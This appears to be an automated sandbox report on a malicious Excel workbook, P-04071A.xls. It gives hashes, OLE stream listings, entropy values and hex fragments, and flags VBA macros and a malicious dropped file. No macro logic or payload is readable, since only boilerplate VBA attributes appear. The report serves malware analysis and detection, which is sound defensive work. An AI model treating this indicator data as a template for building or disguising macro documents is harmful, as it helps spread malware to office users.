                          Preview:......................>...............................................................................C...D...................r...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 12:39:58 2025, Security: 1
                          Category:dropped
                          Size (bytes):891904
                          Entropy (8bit):7.643817796405946
                          Encrypted:false
                          SSDEEP:24576:wpbl/Az1dbIXRMNEVVu3bVgbARM8wFzus:sbpAMX+6VVu3bVJsF
                          MD5:0862FCDA33774D082F9420D9AF4A7023
                          SHA1:6EC5D0F176244E7EBBF6CDCEDB03C0BBEE818C43
                          SHA-256:72A2CD4294229AFFB90BE557322D91D71CBE9C5E30D94A7150AB4C1E506988A4
                          SHA-512:9FE434E1E83B82A11DC96DA6C482E623FC41B7C101C277FD4A59F1E914C0C33D9C7553AB291844840384CC49CD2C304A02A9F8A6909A82988AB0B473F0DECC6C
                          Malicious:true
                          Preview:......................>...............................................................................C...D...................r...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 07:47:18 2025, Security: 1
                          Entropy (8bit):7.768478472124261
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:P-04071A.xls
                          File size:1'275'392 bytes
                          MD5:f12222b43b91b68aa3dcbcf168e7c78b
                          SHA1:4dd717a9449f8241434022fbcded4de68f36ea7c
                          SHA256:8fe9724cf6b6ab32348aaedaa20646f6cbdce0aa09ed317a635602acfb603f0c
                          SHA512:397b92474537a45a4589f7f89b3f018fd33837d5a15b5f108d43532e87c65ec9052133defc216693ec5e5f3ccd5aa974f9451d844b62ed654f37e07de77f8167
                          SSDEEP:24576:yeefLKqPea3tjAb1ZbcPBsTYyS3bVebARM8OZc16TkvxrxX2ccj:zefLKc53lgkP28yS3bVjkcMTsTG5
                          TLSH:6D45F1C3A68D5F42C91583307AB35BAE0712AD07E95262BB22F4731E6BF72D04543F5A
                          File Content Preview:........................>.......................................................................................................l.......n.......p.......r......................................................................................................
                          Icon Hash:35ed8e920e8c81b5
                          Document Type:OLE
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:Microsoft Excel
                          Encrypted Document:True
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:True
                          Code Page:1252
                          Author:
                          Last Saved By:
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2025-01-14 07:47:18
                          Creating Application:Microsoft Excel
                          Security:1
                          Document Code Page:1252
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:786432
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d8 a9 29 91 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet1"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                          VBA File Name:Sheet2.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d8 a9 c5 1f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet2"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                          VBA File Name:Sheet3.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d8 a9 44 7d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet3"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook.cls
                          Stream Size:985
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d8 a9 d9 1a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "ThisWorkbook"
                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.889430592781307
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:200
                          Entropy:3.2403503175049817
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . G . X f . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:MBD0043A31D/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:99
                          Entropy:3.631242196770981
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31D/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:95040
                          Entropy:7.802529482578398
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . M v j . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 19 4d 76 6a ba 01 00 00 38 07 00 00 13 00 d9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.701136490257069
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                          General
                          Stream Path:MBD0043A31E/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:220
                          Entropy:3.3813251513223976
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:MBD0043A31E/MBD000673C0/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD000673C0/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:17987
                          Entropy:7.459551056433264
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD00083EA7/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD00083EA7/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:14238
                          Entropy:7.30552548787177
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD000846C9/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD000846C9/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:708
                          Entropy:3.6235698530352805
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD000846C9/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:372
                          Entropy:2.913345911478729
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD000846C9/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:97808
                          Entropy:7.365095307579232
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD0043A31E/MBD0018D4CE/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:20
                          Entropy:0.5689955935892812
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/MBD0018D4CE/\x3ObjInfo
                          CLSID:
                          File Type:data
                          Stream Size:4
                          Entropy:0.8112781244591328
                          Base64 Encoded:False
                          Data ASCII:. . . .
                          Data Raw:00 00 03 00
                          General
                          Stream Path:MBD0043A31E/MBD0018D4CE/Contents
                          CLSID:
                          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                          Stream Size:197671
                          Entropy:6.989042939766534
                          Base64 Encoded:True
